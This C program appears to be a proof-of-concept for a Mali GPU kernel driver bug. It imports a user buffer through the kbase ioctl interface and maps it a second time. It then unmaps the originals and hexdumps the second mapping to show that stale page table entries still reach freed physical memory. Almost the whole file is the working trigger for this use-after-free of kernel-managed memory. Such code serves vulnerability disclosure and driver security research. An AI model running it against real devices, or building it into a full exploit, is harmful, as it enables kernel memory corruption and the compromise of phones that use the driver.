#define _GNU_SOURCE
#include <err.h>
#include <stdint.h>
#include <fcntl.h>
#include <string.h>
#include <assert.h>
#include <stdio.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t
typedef __u8 base_kcpu_queue_id;

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

#define BASE_MEM_CACHED_CPU (1<<12)
#define BASE_MEM_COHERENT_SYSTEM_REQUIRED (1<<15)
struct base_mem_import_user_buffer {
    __u64 ptr;
      __u64 length;
};
union kbase_ioctl_mem_import {
  struct {
    __u64 flags;
    __u64 phandle;
    __u32 type;
    __u32 padding;
  } in;
  struct {
    __u64 flags;
    __u64 gpu_va;
    __u64 va_pages;
  } out;
};
#define KBASE_IOCTL_MEM_IMPORT \
    _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)

static int setup_mali(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));
  struct kbase_ioctl_version_check vc = { .major = 11, .minor = 11 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED, mali_fd,
              BASE_MEM_MAP_TRACKING_HANDLE));
  return mali_fd;
}

int main(void) {
  int mali_fd = setup_mali();

  char *anon_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  *(volatile char *)anon_mapping = 1;
  struct base_mem_import_user_buffer ubuf = {
    .ptr = (unsigned long)anon_mapping,
    .length = 0x1000
  };
  union kbase_ioctl_mem_import mi = {
    .in = {
      .flags = 0xf/*CPU+GPU R+W*/ | BASE_MEM_CACHED_CPU
                | BASE_MEM_COHERENT_SYSTEM_REQUIRED,
      .phandle = (unsigned long)&ubuf,
      .type = 3/*BASE_MEM_IMPORT_TYPE_USER_BUFFER*/
    }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_IMPORT, &mi));
  printf("MEM_IMPORT result: flags = 0x%lx, gpu_va=0x%lx, va_pages=0x%lx\n",
        (unsigned long)mi.out.flags, (unsigned long)mi.out.gpu_va,
        (unsigned long)mi.out.va_pages);
  assert(mi.out.flags & (1<<14)/*BASE_MEM_NEED_MMAP*/);
  // immediately in GPU_MAPPED state due to BASE_MEM_COHERENT_SYSTEM_REQUIRED
  void *gpu_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_SHARED, mali_fd, mi.out.gpu_va));
  printf("actual host+gpu VA: %p\n", gpu_mapping);


  hexdump(gpu_mapping, 0x1000);

  char *cpu_mapping2 = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                   MAP_SHARED, mali_fd, (off_t)gpu_mapping));
  printf("second host VA: %p\n", cpu_mapping2);
  // intentional side effect: populate PTEs
  hexdump(cpu_mapping2, 0x1000);

  // trigger kbase_gpu_munmap(), transition GPU_MAPPED -> EMPTY
  munmap(gpu_mapping, 0x1000);
  munmap(anon_mapping, 0x1000);
  printf("after munmap:\n");
  // demonstrate that PTEs were not zapped
  hexdump(cpu_mapping2, 0x1000);
}
